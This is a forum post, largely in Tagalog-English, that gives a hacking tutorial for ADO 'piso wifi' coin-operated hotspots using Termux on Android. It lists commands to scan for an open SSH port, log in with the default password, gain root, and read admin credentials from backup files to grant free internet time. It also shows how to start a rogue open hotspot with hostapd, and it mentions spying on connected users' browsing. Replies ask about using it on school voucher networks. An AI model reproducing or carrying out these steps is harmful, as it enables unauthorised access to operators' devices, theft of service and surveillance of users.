What's new

Tutorial Häçk ADO piso wifi systems using android (termux) via ssh.

NzD4rkS3c

Grasshopper
Joined
Apr 27, 2024
Posts
9
Reaction
23
Points
9
ezgif-3-ff9a1c9d0a.png



häçk ado pisowifi version 3.x.x by connecting via ssh using android.

1.
Download termux from: You do not have permission to view the full content of this post. Log in or register now.
2
. Install termux.
3. Open termux (make sure you have internet connection)
4. update packages:
pkg update -y && pkg upgrade -y
5. install ssh client:
pkg install openssh nmap -y
6. check if open ba yung ssh port:
nmap -p 22 10.0.0.1 -T4
May pag nakikita kayo na something na ganto:
PORT STATE SERVICE
22/tcp open ssh
means open ung port ng ssh which is ung kokonnekan natin para maccess yung system ng ado..
(naka open din to sa pisofi, diko lang alam password, but soon..), pag yung STATE is closed then.. naka close yung ssh, di ka makakaconnect.

7. connect to ssh server
type password raspberry as password.

Then ngayon nasa loob kana ng system ng ado.. sa mismong loob ng system. dito kung marunong ka maglinux pede mu gawin lahat, like spy sa mga nakaconnect tignan yung mga sites na pinuntahan nila.. ibahin yung page ng pisowifi gawing kung ano ano.. pero for this tut ang ituturo ko lang is kung pano magkainternet

NOTE: Dito sa baba lahat ng process dito is sa loob na ng ado pisowifi system, kapag naka connect na kayo sa SSH server. Hindi required na magroot ng cp.

GAINING INTERNET ACCESS METHODS:

METHOD #1: häçkING THE ADMIN PANEL
Since wala namang password ung root ng ado.. so switch to root instead normal user shell.

ON ADO SYSTEM: (pi@10 ~$) ganyan makikita nyo.. pagkatapos komonect sa ssh..

1. first have a root access:
yung pi@10 ~:$ magiging root@10 ~:# para di na need ng sudo kada execute ng command.

2. install packages that you will use later:
apt install unzip wget nmap -y
3. go to piso wifi backup:
cd /opt/piso-wifi/backup
4. extract backup files using unzip:
# unzip <backup filename>
5. then go to backup folder:
cd <backup folder name>
6. read the files (usernames for admin panel) backup:
cat <filename>
and you will see the username and password for admin.
7. goto You do not have permission to view the full content of this post. Log in or register now. and use the username and password to add time.


METHOD #2: CREATING A OPEN HOTSPOT THAT WILL PROVIDE INTERNET FOR ALL.
1. first have a root access:
2. goto etc directory:
cd /etc/hostapd/
3. create a config file:
printf 'interface=wlan0\nssid=Free WiFi\nhw_mode=g\nchannel=7' >> hostapd-freewifi.conf
4. start the hostpot:
hostapd hostapd-freewifi.conf
5. connect to Free WiFi.

NOTE: if the piso wifi is restarted the hotspot will disappear.

Edited


häçkED BY AndroS3c PH
 

Attachments

Last edited:
Salamat idol keep sharing sayang not working sa Custom rom ko nka close saka na pag palit ko ulit ng rom
 
Mag work ba to sa mga wifi na need ng voucher? Sa school kasi may wifi na need ng voucher access ganon
 

Users search this thread by keywords

  1. Piso wifi
  2. lpb wifi
  3. Piso wifi häçk
  4. häçk piso wifi
  5. Termux wifi
  6. Root phone
  7. Ado
  8. create config piso wifi no hulog
  9. Ado wifi
  10. 10.0.0.1
  11. Pisowifi termux
  12. pisowifi
Back
Top